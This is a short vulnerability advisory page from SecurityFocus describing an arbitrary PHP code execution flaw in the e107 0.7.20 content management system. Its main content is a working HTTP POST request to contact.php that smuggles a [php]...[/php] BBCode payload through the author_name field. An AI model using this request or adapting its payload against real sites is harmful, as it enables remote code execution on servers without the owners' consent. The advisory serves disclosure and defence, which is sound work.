e107 BBCode Arbitrary PHP Code Execution Vulnerability

Attackers can exploit this issue using a browser.

The following example is available:

POST /contact.php HTTP/1.1
Host: www.example.com
User-Agent: e107 0.7.20 Remote Code Execution Exploit
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php]&

The following exploit is also available:


 

Privacy Statement
Copyright 2010, SecurityFocus